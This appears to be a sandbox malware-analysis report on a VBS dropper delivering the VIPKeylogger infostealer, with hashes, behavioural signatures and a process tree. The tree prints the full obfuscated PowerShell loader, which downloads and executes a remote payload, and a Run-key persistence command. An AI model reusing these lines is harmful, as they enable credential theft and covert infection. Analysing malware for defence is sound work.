Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
26/02/2025, 08:55
Static task
static1
Behavioral task
behavioral1
Sample
AH72799_MINES SERVICES SURINAME N.V.vbs
Resource
win7-20250207-en
Behavioral task
behavioral2
Sample
AH72799_MINES SERVICES SURINAME N.V.vbs
Resource
win10v2004-20250217-en
General
-
Target
AH72799_MINES SERVICES SURINAME N.V.vbs
-
Size
66KB
-
MD5
0413291a862dec930cbeacabe1f57e8c
-
SHA1
264609925d33aa4a99dbf0246f0fd8680f94a8c7
-
SHA256
4d2227e8ebf7c5711159c86ccd59d8007ca4ffc56d1d6d13c7bcb4494875756e
-
SHA512
9595f534d657f39fd08df644bff62cb28d2eca57c17279e8df28f21a0fb094658cfebb2b3b5f83c060e7e80444d111e2938b907f42cffc807afcb73f291ca3cf
-
SSDEEP
1536:apfuabI6RmNplnvrfKpI2ItF/6RH5UUYfD2:aW6RmVnTipgCRZSC
Malware Config
Extracted
vipkeylogger
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Blocklisted process makes network request 6 IoCs
flow pid Process 29 2340 powershell.exe 60 4856 msiexec.exe 62 4856 msiexec.exe 65 4856 msiexec.exe 67 4856 msiexec.exe 75 4856 msiexec.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\neutronbombers = "%Saalskaaneres% -windowstyle 1 $Timbrel209=(gi 'HKCU:\\Software\\Dietary157\\').GetValue('Nitrile');%Saalskaaneres% ($Timbrel209)" reg.exe -
pid Process 2340 powershell.exe 2000 powershell.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 64 checkip.dyndns.org 66 reallyfreegeoip.org 67 reallyfreegeoip.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4856 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2000 powershell.exe 4856 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 2340 powershell.exe 2340 powershell.exe 2000 powershell.exe 2000 powershell.exe 2000 powershell.exe 4856 msiexec.exe 4856 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2000 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2340 powershell.exe Token: SeDebugPrivilege 2000 powershell.exe Token: SeDebugPrivilege 4856 msiexec.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1860 wrote to memory of 2340 1860 WScript.exe 94 PID 1860 wrote to memory of 2340 1860 WScript.exe 94 PID 2000 wrote to memory of 4856 2000 powershell.exe 108 PID 2000 wrote to memory of 4856 2000 powershell.exe 108 PID 2000 wrote to memory of 4856 2000 powershell.exe 108 PID 2000 wrote to memory of 4856 2000 powershell.exe 108 PID 4856 wrote to memory of 4576 4856 msiexec.exe 109 PID 4856 wrote to memory of 4576 4856 msiexec.exe 109 PID 4856 wrote to memory of 4576 4856 msiexec.exe 109 PID 4576 wrote to memory of 3856 4576 cmd.exe 111 PID 4576 wrote to memory of 3856 4576 cmd.exe 111 PID 4576 wrote to memory of 3856 4576 cmd.exe 111 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AH72799_MINES SERVICES SURINAME N.V.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Monteverdi;function Haskwort($Fatshedera){ .($Scrofulorachitic89) ($Fatshedera)} function Trompetsneglenes($Blegsotigt){$furnishing=4;do{$Habilitetsgrunde+=$Blegsotigt[$furnishing];Format-List;$furnishing+=5} until(!$Blegsotigt[$furnishing])$Habilitetsgrunde}$Renvaskedes=Trompetsneglenes ' PicNOr,rENonht Med.Fa tw';$Renvaskedes+=Trompetsneglenes 'Jew eB edB tencDimoL ReiISkatESnipn agT';$sekarrenes=Trompetsneglenes 'DemeMVognoRakezAs,aiBrealKinelmulta Til/';$Flokinstinktet205=Trompetsneglenes ' G rT VejlFra sTolv1Pro.2';$Zoblers=' tnk[DdlkNS niEGramT,ake.Indissupee L,bR TolvDydsiR.mpCVisce cafpSperOVir IRustNAf,rtDan.mCuraAJazznHuncAPh tgFathe BybrSkr.].ele:Opiu:Engas ebEDimmc OliUForprFritId plt O ey FacP VinrStavo R pTByploConcCTendOCyprLErem=Fu d$NunaFTentlBackoAfmikHy eIPreoN e iSStattGodeIJ ednS.gnk BintBlueEBergTSild2Uafv0Vapo5';$sekarrenes+=Trompetsneglenes 'ev l5knip.Arbe0Pro .ina(TumuWToadi.ustnMilldEn,roOpnaw N ks en SinuNEddeTFire m.l1over0Fart. Ba 0 hy ;Numa PemoW amiNo snPhag6S bb4P ss;Enc Mi.xBest6 Unm4Flie;Mods nonfrPr cvInit:Teat1 Tho3Endo4Dige.Plas0 For)Dybl LeveGLunge ,decPantkReplo .io/ Sal2,edn0 ind1,ira0Subm0Gryd1Saer0 Spr1Apl ,ilFGokaiadvirFabreFrysfArmnoArn xBunn/Dump1Uns 3Styr4H ve. ort0';$Supersensitiveness=Trompetsneglenes 'F ruUchocs Sa e SedrSwan-FairA CilG ltrE ndenDataT';$Prges=Trompetsneglenes ' rieh scht ost fa pSolbsNedg:G im/Rean/VitrcSundaYaoufdetefSjlde UdtcIsochGruniGeniaForbnR mo.vaskcBorgo vermSams/SmoeiForgnVeruvTrip/MillO.echpV,sirTrepeBiditLasttampue rtilSequs uoye ProsSh caVacafSavegPiq iBasifRatitParfsBall.T ermArtusconti';$Playpen=Trompetsneglenes ' Rho>';$Scrofulorachitic89=Trompetsneglenes ' C oIDecae ketx';$Malvales='Vakkelvornes';$Sulpician='\Impropriator.fem';Haskwort (Trompetsneglenes 'Fors$Ju,dGSpejLSulloDet.BAutoACitrl Frk: E.uS BarYAksesAnthTSupee .vamCh rTIta,iRetop.nprn sm i.hecnBlokGBroc=Lage$LuciEFreqn ikv Tan: zigaShriP alopJourDTongASlictUdtnASymb+Quak$OrigSPreauI niLSupepAfseiPeteCChubiMunja Ly,N');Haskwort (Trompetsneglenes 'Paro$BalggSu cL.ikroUgerbL,sea Bemlloft:DellSProou oloB Su.M FreioverN T ri moSSliptPalprReguA PosNMyxoTFrim=Coun$DisopLimarcav,GForheSuveSFlle.Cl nSFal PPreplAal iHo dtopti(Tota$kamspMisclDegeA,ndeYSeptPFa iEpartNSpec)');Haskwort (Trompetsneglenes $Zoblers);$Prges=$Subministrant[0];$neons=(Trompetsneglenes 'Rest$Dep.Gc.sulBri OPassbInc AUnlelUn l:Sv,rAHaugE OpsS alaOOverN Tra=fixtNCro.eLgs WHort-T.skOPudsbBialj Ov E recThertK ll EyepsC.lcyPe,nSDwintCinneH lvm Rke.Orga$ ,egrWh.oeTilbNToxiv Sika So sMar kCo rEIsopd,ungE K ns');Haskwort ($neons);Haskwort (Trompetsneglenes 'A us$ForbANordetur sSlagoErucnHyle.CistH BoueStama,utsdEthne rofrJek sex t[ Ext$FormSNr suPalgpM,leeDrogrSubcsOmheeS ornLamps F.ri anntPseuiomravFil eUnban VejeU sts tyrsBez ]Bro =Feck$IncesCrageMah kKortaAllorEccarRu.oe.etanSkateShees');$Klubvrelse=Trompetsneglenes 'skel$ StaA AanefippsMotho.licnb ot.SkumD.utoo olw NepnUd,olfo,toUdf a AssdNoneFStori DoblR,pueKim,(Hind$SphaPAligrKunsgVi.ieMukks tre,Kass$OrdnFAktioUde rSpromU ria Pa,n NaudjimbsBun ptolvo RemsFordtshraeOrchr TrinSp re GansSa d)';$Formandsposternes=$Systemtipning;Haskwort (Trompetsneglenes 'Told$MetaGFimbLGad OUretB Beba llalBear:M ltiUpr N UovNBog uWarrMAvlieLe tR HusA InvB,ngrLHerdeCannnKasseSu,dsHamsS epu= il( CittRet,ElambsEksht Mul-bhojPanstANegetDow hTal For$T doFH reOTontrPol MUnvea SekNStoldH drsFlyvPFileO HybsS.imTTurreClamrSp rn MereOmveSLyss)');while (!$Innumerableness) {Haskwort (Trompetsneglenes 'Fina$CystgAnt lSu roJuleb,onia nprlJord:ElfeV verrDisadRougiD,sagkla.hBen,e.ofudPen.s StikPrebr DaraC.nsvP mpe NivnDer,eKl.i=garn$ShoaTFordo UmemOpsie,atcnCi.ctBjniu ntm') ;Haskwort $Klubvrelse;Haskwort (Trompetsneglenes 'Utro[AlmetEgochLetur biseVariACzarD ensISideNPostGHarm.IntetC.udHIndvrspekeSysta GruDSrge] Cob:,ona:RetrsSamslSak eP efethroPpoin( Rep4Grut0La d0 ard0Tr m)');Haskwort (Trompetsneglenes ' dle$DingGGra LBr,nO otoBSta aL,nilDemo:RangIkrllNBen,NC luuI famMusneBulbr HomAPignbEuphLLongElighnKiloekamuS iagSC ll=h lp(Klant StrE,ympsBevitAbor- SlepIdepaD sttCenthPla Mill$PhagfRaavO,arcrPianmRemaaFeriNG updSigmsNorepGua oBaths Foat M nE g.dR Tr NThy EHyp sCata)') ;Haskwort (Trompetsneglenes 'grsr$OvergC,wplFlleoTenaBA skaStaklLi t:Ko.dBSpleEBr.dsCo.gt.imiI A,oAGunpR blai SprA VilNLon = Dam$ HjeGS urlAnapot ndBLensaSlmmL Tff:SimpC.chlhCa pAOve uOkseFProcE errRImp sOnag+ Mis+I.on%,isp$Ur aSKanaU erbF.rsmTriaiindsNPenii a esBesmtNyskrA teAme,vNS,rkTDec,.R,accBeatOP niuFor,nMainT') ;$Prges=$Subministrant[$Bestiarian]}$Suctions=288784;$Skies=31348;Haskwort (Trompetsneglenes ' old$ Selg Moul obsorestBLektaMaa lCard:PossK BiraRea.TJ,gtAOrcinstrikMackeSildRSkra K lb= rs F.bGRanseHurtTBade-amblc hinoMidnn .arTVrlee EgeNGa,ntTose Sk a$ KonF TupobultRdireMForla RegnPozzd rotSL gppNilgOKands C.ptKrakE nybRFilmnFenaEFireS');Haskwort (Trompetsneglenes ' Tor$RickgPrmilGuldo aelbSojaaAktil Mal:hersHBegoeTalaiPh tdUdlgiNajeeTe n past=Demo Teks[ SkaS Runy TeksEd atRebbe npmUnpu.Gi sC JuroSeptnB.ndvCo teMi prMisetStat] ,et:Anbe:AntiFtierrFrouo LavmInduB .ndaUdrasClifec ll6 ros4PunkSRaa tPictr OveiR,ddnS eagSjle(Clea$LivsK T.raK llt,esoamonenTelekPapaeDemor agl)');Haskwort (Trompetsneglenes 'Hemo$DoceG PhyLSv joStembAbomAsmr lPlai:L,sbFHavfi ataBSynsE arorUnshSVegeP uftrKi lNArkeGUnpeNSt rI,awmN V.ggHa dEPearNFor.sKano Rein=Land Nyh [ Trasminky .tasRedntBaadESmaaMBek,.LipoTD plE parxStuetSid .Obj.EB,rgNSlagC avOSakrd e gIE.ecN BargPens] Ha :Fdre:So aA U.hSBu,gcFreeICakrI,tay.In dGZoneEAp oTLedsSPlimT estrGlosiImpaNAcriGSvbe(baga$Hed hSivnETro iMonodViviiLedse L.t)');Haskwort (Trompetsneglenes 'Doug$ TeogHjmoLSt gORbarBGrapa nesL cu : ,liB.seuR blO Fi WP umSFr ktTere=Plet$Aggrf SeriBi lBHun eBin R MedSNeofpImp R HolNFallg eodnSc eI binNGen gAuxeEAarrNstiksSkif.DonkS Bo.U DikBNon Svandt AsmrNemmiAlmenHaecGSkft( ali$skufSBlotu BjecUofftLiceiFjerO ,unNethisMuss,Hjti$Jenas,araKVen iUnfaeFlkksLand)');Haskwort $browst;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Monteverdi;function Haskwort($Fatshedera){ .($Scrofulorachitic89) ($Fatshedera)} function Trompetsneglenes($Blegsotigt){$furnishing=4;do{$Habilitetsgrunde+=$Blegsotigt[$furnishing];Format-List;$furnishing+=5} until(!$Blegsotigt[$furnishing])$Habilitetsgrunde}$Renvaskedes=Trompetsneglenes ' PicNOr,rENonht Med.Fa tw';$Renvaskedes+=Trompetsneglenes 'Jew eB edB tencDimoL ReiISkatESnipn agT';$sekarrenes=Trompetsneglenes 'DemeMVognoRakezAs,aiBrealKinelmulta Til/';$Flokinstinktet205=Trompetsneglenes ' G rT VejlFra sTolv1Pro.2';$Zoblers=' tnk[DdlkNS niEGramT,ake.Indissupee L,bR TolvDydsiR.mpCVisce cafpSperOVir IRustNAf,rtDan.mCuraAJazznHuncAPh tgFathe BybrSkr.].ele:Opiu:Engas ebEDimmc OliUForprFritId plt O ey FacP VinrStavo R pTByploConcCTendOCyprLErem=Fu d$NunaFTentlBackoAfmikHy eIPreoN e iSStattGodeIJ ednS.gnk BintBlueEBergTSild2Uafv0Vapo5';$sekarrenes+=Trompetsneglenes 'ev l5knip.Arbe0Pro .ina(TumuWToadi.ustnMilldEn,roOpnaw N ks en SinuNEddeTFire m.l1over0Fart. Ba 0 hy ;Numa PemoW amiNo snPhag6S bb4P ss;Enc Mi.xBest6 Unm4Flie;Mods nonfrPr cvInit:Teat1 Tho3Endo4Dige.Plas0 For)Dybl LeveGLunge ,decPantkReplo .io/ Sal2,edn0 ind1,ira0Subm0Gryd1Saer0 Spr1Apl ,ilFGokaiadvirFabreFrysfArmnoArn xBunn/Dump1Uns 3Styr4H ve. ort0';$Supersensitiveness=Trompetsneglenes 'F ruUchocs Sa e SedrSwan-FairA CilG ltrE ndenDataT';$Prges=Trompetsneglenes ' rieh scht ost fa pSolbsNedg:G im/Rean/VitrcSundaYaoufdetefSjlde UdtcIsochGruniGeniaForbnR mo.vaskcBorgo vermSams/SmoeiForgnVeruvTrip/MillO.echpV,sirTrepeBiditLasttampue rtilSequs uoye ProsSh caVacafSavegPiq iBasifRatitParfsBall.T ermArtusconti';$Playpen=Trompetsneglenes ' Rho>';$Scrofulorachitic89=Trompetsneglenes ' C oIDecae ketx';$Malvales='Vakkelvornes';$Sulpician='\Impropriator.fem';Haskwort (Trompetsneglenes 'Fors$Ju,dGSpejLSulloDet.BAutoACitrl Frk: E.uS BarYAksesAnthTSupee .vamCh rTIta,iRetop.nprn sm i.hecnBlokGBroc=Lage$LuciEFreqn ikv Tan: zigaShriP alopJourDTongASlictUdtnASymb+Quak$OrigSPreauI niLSupepAfseiPeteCChubiMunja Ly,N');Haskwort (Trompetsneglenes 'Paro$BalggSu cL.ikroUgerbL,sea Bemlloft:DellSProou oloB Su.M FreioverN T ri moSSliptPalprReguA PosNMyxoTFrim=Coun$DisopLimarcav,GForheSuveSFlle.Cl nSFal PPreplAal iHo dtopti(Tota$kamspMisclDegeA,ndeYSeptPFa iEpartNSpec)');Haskwort (Trompetsneglenes $Zoblers);$Prges=$Subministrant[0];$neons=(Trompetsneglenes 'Rest$Dep.Gc.sulBri OPassbInc AUnlelUn l:Sv,rAHaugE OpsS alaOOverN Tra=fixtNCro.eLgs WHort-T.skOPudsbBialj Ov E recThertK ll EyepsC.lcyPe,nSDwintCinneH lvm Rke.Orga$ ,egrWh.oeTilbNToxiv Sika So sMar kCo rEIsopd,ungE K ns');Haskwort ($neons);Haskwort (Trompetsneglenes 'A us$ForbANordetur sSlagoErucnHyle.CistH BoueStama,utsdEthne rofrJek sex t[ Ext$FormSNr suPalgpM,leeDrogrSubcsOmheeS ornLamps F.ri anntPseuiomravFil eUnban VejeU sts tyrsBez ]Bro =Feck$IncesCrageMah kKortaAllorEccarRu.oe.etanSkateShees');$Klubvrelse=Trompetsneglenes 'skel$ StaA AanefippsMotho.licnb ot.SkumD.utoo olw NepnUd,olfo,toUdf a AssdNoneFStori DoblR,pueKim,(Hind$SphaPAligrKunsgVi.ieMukks tre,Kass$OrdnFAktioUde rSpromU ria Pa,n NaudjimbsBun ptolvo RemsFordtshraeOrchr TrinSp re GansSa d)';$Formandsposternes=$Systemtipning;Haskwort (Trompetsneglenes 'Told$MetaGFimbLGad OUretB Beba llalBear:M ltiUpr N UovNBog uWarrMAvlieLe tR HusA InvB,ngrLHerdeCannnKasseSu,dsHamsS epu= il( CittRet,ElambsEksht Mul-bhojPanstANegetDow hTal For$T doFH reOTontrPol MUnvea SekNStoldH drsFlyvPFileO HybsS.imTTurreClamrSp rn MereOmveSLyss)');while (!$Innumerableness) {Haskwort (Trompetsneglenes 'Fina$CystgAnt lSu roJuleb,onia nprlJord:ElfeV verrDisadRougiD,sagkla.hBen,e.ofudPen.s StikPrebr DaraC.nsvP mpe NivnDer,eKl.i=garn$ShoaTFordo UmemOpsie,atcnCi.ctBjniu ntm') ;Haskwort $Klubvrelse;Haskwort (Trompetsneglenes 'Utro[AlmetEgochLetur biseVariACzarD ensISideNPostGHarm.IntetC.udHIndvrspekeSysta GruDSrge] Cob:,ona:RetrsSamslSak eP efethroPpoin( Rep4Grut0La d0 ard0Tr m)');Haskwort (Trompetsneglenes ' dle$DingGGra LBr,nO otoBSta aL,nilDemo:RangIkrllNBen,NC luuI famMusneBulbr HomAPignbEuphLLongElighnKiloekamuS iagSC ll=h lp(Klant StrE,ympsBevitAbor- SlepIdepaD sttCenthPla Mill$PhagfRaavO,arcrPianmRemaaFeriNG updSigmsNorepGua oBaths Foat M nE g.dR Tr NThy EHyp sCata)') ;Haskwort (Trompetsneglenes 'grsr$OvergC,wplFlleoTenaBA skaStaklLi t:Ko.dBSpleEBr.dsCo.gt.imiI A,oAGunpR blai SprA VilNLon = Dam$ HjeGS urlAnapot ndBLensaSlmmL Tff:SimpC.chlhCa pAOve uOkseFProcE errRImp sOnag+ Mis+I.on%,isp$Ur aSKanaU erbF.rsmTriaiindsNPenii a esBesmtNyskrA teAme,vNS,rkTDec,.R,accBeatOP niuFor,nMainT') ;$Prges=$Subministrant[$Bestiarian]}$Suctions=288784;$Skies=31348;Haskwort (Trompetsneglenes ' old$ Selg Moul obsorestBLektaMaa lCard:PossK BiraRea.TJ,gtAOrcinstrikMackeSildRSkra K lb= rs F.bGRanseHurtTBade-amblc hinoMidnn .arTVrlee EgeNGa,ntTose Sk a$ KonF TupobultRdireMForla RegnPozzd rotSL gppNilgOKands C.ptKrakE nybRFilmnFenaEFireS');Haskwort (Trompetsneglenes ' Tor$RickgPrmilGuldo aelbSojaaAktil Mal:hersHBegoeTalaiPh tdUdlgiNajeeTe n past=Demo Teks[ SkaS Runy TeksEd atRebbe npmUnpu.Gi sC JuroSeptnB.ndvCo teMi prMisetStat] ,et:Anbe:AntiFtierrFrouo LavmInduB .ndaUdrasClifec ll6 ros4PunkSRaa tPictr OveiR,ddnS eagSjle(Clea$LivsK T.raK llt,esoamonenTelekPapaeDemor agl)');Haskwort (Trompetsneglenes 'Hemo$DoceG PhyLSv joStembAbomAsmr lPlai:L,sbFHavfi ataBSynsE arorUnshSVegeP uftrKi lNArkeGUnpeNSt rI,awmN V.ggHa dEPearNFor.sKano Rein=Land Nyh [ Trasminky .tasRedntBaadESmaaMBek,.LipoTD plE parxStuetSid .Obj.EB,rgNSlagC avOSakrd e gIE.ecN BargPens] Ha :Fdre:So aA U.hSBu,gcFreeICakrI,tay.In dGZoneEAp oTLedsSPlimT estrGlosiImpaNAcriGSvbe(baga$Hed hSivnETro iMonodViviiLedse L.t)');Haskwort (Trompetsneglenes 'Doug$ TeogHjmoLSt gORbarBGrapa nesL cu : ,liB.seuR blO Fi WP umSFr ktTere=Plet$Aggrf SeriBi lBHun eBin R MedSNeofpImp R HolNFallg eodnSc eI binNGen gAuxeEAarrNstiksSkif.DonkS Bo.U DikBNon Svandt AsmrNemmiAlmenHaecGSkft( ali$skufSBlotu BjecUofftLiceiFjerO ,unNethisMuss,Hjti$Jenas,araKVen iUnfaeFlkksLand)');Haskwort $browst;"1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:4856 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "neutronbombers" /t REG_EXPAND_SZ /d "%Saalskaaneres% -windowstyle 1 $Timbrel209=(gi 'HKCU:\Software\Dietary157\').GetValue('Nitrile');%Saalskaaneres% ($Timbrel209)"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "neutronbombers" /t REG_EXPAND_SZ /d "%Saalskaaneres% -windowstyle 1 $Timbrel209=(gi 'HKCU:\Software\Dietary157\').GetValue('Nitrile');%Saalskaaneres% ($Timbrel209)"4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:3856
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5b2b50acfbc37d5bbf8085e3b38fd5c59
SHA197f91ea27e0be9b9f147548e936faff6365cf184
SHA25628c4f1eaffff3596495fee89b52bf3536ce8cdf41b8c1717c48ab0cdc8c98828
SHA51233df954d1a1cd8f7fa1224be30c9b438714248bf122c3ed9742d86bdb429aadb996e0d3fa38de5905a9b2c464657ff5c1f899a31372e42212832c4441e6541f0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
416KB
MD569744afe5ed7766eb2c8408b43c5be6f
SHA1a1df119996f05a9d3aeafb35a8793c2ee6c2d967
SHA2567228e757b1852f34d6e3bdaf3c6de05abad4e2fab4bc4f9c37ec70a46e917c6c
SHA5127ff94ee1fa4d479ce73c8369583089b03cd5a4b9e479c2f06df129e171343c80c86ff4c003ddb49286445993bd3ddb1d20601cb7da1aa670d95a35fa1be9e60f